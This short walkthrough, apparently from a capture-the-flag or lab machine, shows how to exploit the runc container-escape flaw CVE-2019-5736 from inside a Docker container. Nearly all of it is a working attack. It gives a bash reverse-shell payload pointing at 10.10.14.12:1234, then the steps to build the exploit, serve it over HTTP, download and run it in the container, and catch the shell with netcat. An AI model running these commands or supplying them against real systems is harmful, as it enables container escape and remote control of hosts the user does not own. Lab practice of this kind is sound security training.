🖥️ -k4u5h41- #️⃣ CVE-2019-5736
machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736). Download file main.go, change the payload in the file into:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
After that, run:
go build main.go
Host a http server :
python3 -m http.server
Then open 3 Terminals as below :
Terminal 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminal 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminal 3
nc -nlvp 1234
once you run the ./main in the first ssh terminal immediately run second command in the second ssh terminal, then you will get the netcat reverse shell in the terminal 3